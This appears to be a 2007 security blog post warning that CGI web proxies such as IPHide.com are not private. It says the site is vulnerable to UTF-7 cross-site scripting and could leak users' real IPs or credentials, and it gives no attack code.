I like to report on these about once a month because they keep popping up and people keep selling them like they are the be-all end-all to privacy. Non parsed header CGI proxies are not secure from a privacy perspective. They just aren’t. Not only because they are vulnerable to XSS, but because they can leak your information to the party you are trying to avoid having your information leaked to. In the case of IPHide.com it’s no different. IPHide is vulnerable to the UTF-7 XSS vector. That means that any page you go to using IPHide and authenticate to is vulnerable to having your information stolen, which is kinda bad, I guess, but more importantly, your information can be transferred over the wire to locate your real IP.

Like I said in an earlier post, if you are relying on this to not get kicked out of school or busted by your office, you had better think twice. Unlike a normal proxy it relies heavily on two things 1) being able to strip out any content that could possibly leak where you are really intending to go and 2) the content filter not using patterns that could be used to pick up the fact that you are in fact surfing for porn or hacking or whatever it is you’re doing that you shouldn’t be. Although I must say it is ridiculously easy to get around content filters if you control both the client and the server, it’s much harder to properly filter out all forms of active content.

Now onto the second part of this, none of the links on the bottom of the page (FAQ, Privacy Policy, Terms of Service, or About us) are valid links. So either this is just a terribly sloppy page, or it is a way for people to steal information from you (login credentials). Sort of like phishing, only you are knowingly using a proxy. Kinda clever if it is being used as that. I don’t assume to say one way or another, it just struck me as an amusing way to abuse people’s paranoia to get information from them.

This entry was posted on Friday, April 6th, 2007 at 8:56 am and is filed under XSS, Webappsec. You can leave a response as well.